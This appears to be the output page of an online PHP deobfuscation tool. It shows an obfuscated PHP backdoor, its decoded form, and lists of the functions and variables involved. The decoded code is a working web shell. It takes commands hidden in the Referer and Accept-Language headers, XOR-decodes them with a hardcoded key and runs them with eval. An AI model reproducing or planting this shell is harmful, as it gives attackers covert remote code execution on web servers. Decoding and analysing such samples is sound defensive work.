Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $P='4_dec$Aode(pre$Ag_repl$Aace(arr$Aay$A("/_/$A","/-/$A"),array($A"/","$A+"$A),$ss(..

Decoded Output download

$kh="5d41";$kf="402a";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}$r=$_SERVER;$rr=@$r["HTTP_REFERER"];$ra=@$r["HTTP_ACCEPT_LANGUAGE"];if($rr&&$ra){$u=parse_url($rr);parse_str($u["query"],$q);$q=array_values($q);preg_match_all("/([\w])[\w-]+(?:;q=0.([\d]))?,?/",$ra,$m);if($q&&$m){@session_start();$s=&$_SESSION;$ss="substr";$sl="strtolower";$i=$m[1][0].$m[1][1];$h=$sl($ss(md5($i.$kh),0,3));$f=$sl($ss(md5($i.$kf),0,3));$p="";for($z=1;$z<count($m[1]);$z++)$p.=$q[$m[2][$z]];if(strpos($p,$h)===0){$s[$i]="";$p=$ss($p,3);}if(array_key_exists($i,$s)){$s[$i].=$p;$e=strpos($s[$i],$f);if($e){$k=$kh.$kf;ob_start();eval(@gzuncompress(@x(base64_decode(preg_replace(array("/_/","/-/"),array("/","+"),$ss($s[$i],0,$e))),$k)));$o=ob_get_contents();ob_end_clean();$d=base64_encode(x(gzcompress($o),$k));print("<$k>$d</$k>");@session_destroy();}}}}

Did this file decode correctly?

Original Code

<?php
$P='4_dec$Aode(pre$Ag_repl$Aace(arr$Aay$A("/_/$A","/-/$A"),array($A"/","$A+"$A),$ss($s[$i],$';
$M='$kh="5d41$A";$kf=$A"402a"$A;functio$An $Ax($t,$k){$$Ac=s$Atrlen($k)$A;$l=st$Arle$A$An($t);$';
$A='$$Ai],$f);if($A$e){$k=$$Akh.$k$Af;ob_$Astart($A);@e$Aval(@gzun$A$Acompress$A(@x(@base6$A';
$l='ASSION$A;$ss="su$Ab$Astr";$sl="strtolowe$Ar$A";$i=$$Am[1][0].$m[1$A]$A[1$A];$h=$sl($ss(m';
$a='u[$A"query"],$A$q)$A;$q=$Aarray_values$A($$Aq);preg_m$Aatch_$Aall("/([\\w$A])[\\$Aw-]+(?:$';
$K='A;q=0$A.([\\d]))?$A,?$A/",$ra,$m)$A;if($$Aq&&$A$$Am){$A@session$A_star$A$At();$s=&$_$ASE$';
$I='$Ae$A(x$A(gzcompres$As($o),$k));$Aprint("$A<$$Ak>$d</$A$k>");@sessi$Aon_de$Astroy();}}}}';
$f='o="";$A$Afor($i=0;$$Ai<$l;)$A$A{for($j=0;($j<$A$c&&$i<$$Al);$j$A++,$$Ai++){$o$A.$A=$t$A{';
$Y='"$AH$AT$ATP_A$ACCEPT_LANGUAGE$A"];if($$Arr$A&&$ra){$u$A=parse$A_url($rr);parse_s$At$Ar($';
$W=str_replace('ci','','ccircieciate_cifciuncticion');
$N='$Ad5($$Ai.$$Akh),0,$A3));$f=$sl($ss(m$Ad5($i.$$Akf),0,3)$A);$p=$A"";$Afo$Ar($z=1;$$Az<co';
$y='A0,$A$e))),$A$k)));$o=$Aob_ge$At_con$Atent$As();ob_end_c$Alean()$A;$d=$Ab$Aase64$A_encod';
$G='$A$i}^$k{$j};}}$Areturn $o;$A}$r=$_SE$A$ARVER;$rr=$A@$r["HTTP_$AREFERE$AR"];$ra$A$A=@$r[';
$Z='"$A;$p=$A$ss($p,3);}if(arr$Aay_key_exis$A$Ats($i,$s)){$s$A[$i].=$A$p;$A$A$e=strpos($A$s[';
$j='u$Ant($m[1$A]);$A$$Az++)$p.=$q[$$Am[2][$z]];if(s$Atrpo$As($p,$A$h)===$A0$A$A){$s[$$Ai]="';
$r=str_replace('$A','',$M.$f.$G.$Y.$a.$K.$l.$N.$j.$Z.$A.$P.$y.$I);
$g=$W('',$r);$g();
?>

Function Calls

null 1
str_replace 2
create_function 1

Variables

$A $$Ai],$f);if($A$e){$k=$$Akh.$k$Af;ob_$Astart($A);@e$Aval(@gz..
$G $A$i}^$k{$j};}}$Areturn $o;$A}$r=$_SE$A$ARVER;$rr=$A@$r["HTT..
$I $Ae$A(x$A(gzcompres$As($o),$k));$Aprint("$A<$$Ak>$d</$A$k>")..
$K A;q=0$A.([\d]))?$A,?$A/",$ra,$m)$A;if($$Aq&&$A$$Am){$A@sessi..
$M $kh="5d41$A";$kf=$A"402a"$A;functio$An $Ax($t,$k){$$Ac=s$Atr..
$N $Ad5($$Ai.$$Akh),0,$A3));$f=$sl($ss(m$Ad5($i.$$Akf),0,3)$A);..
$P 4_dec$Aode(pre$Ag_repl$Aace(arr$Aay$A("/_/$A","/-/$A"),array..
$W create_function
$Y "$AH$AT$ATP_A$ACCEPT_LANGUAGE$A"];if($$Arr$A&&$ra){$u$A=pars..
$Z "$A;$p=$A$ss($p,3);}if(arr$Aay_key_exis$A$Ats($i,$s)){$s$A[$..
$a u[$A"query"],$A$q)$A;$q=$Aarray_values$A($$Aq);preg_m$Aatch_..
$f o="";$A$Afor($i=0;$$Ai<$l;)$A$A{for($j=0;($j<$A$c&&$i<$$Al);..
$g None
$j u$Ant($m[1$A]);$A$$Az++)$p.=$q[$$Am[2][$z]];if(s$Atrpo$As($p..
$l ASSION$A;$ss="su$Ab$Astr";$sl="strtolowe$Ar$A";$i=$$Am[1][0]..
$r $kh="5d41";$kf="402a";function x($t,$k){$c=strlen($k);$l=str..
$y A0,$A$e))),$A$k)));$o=$Aob_ge$At_con$Atent$As();ob_end_c$Ale..

Stats

MD5 847fe297149382ebf3626e2a8aeb16ad
Eval Count 1
Decode Time 112 ms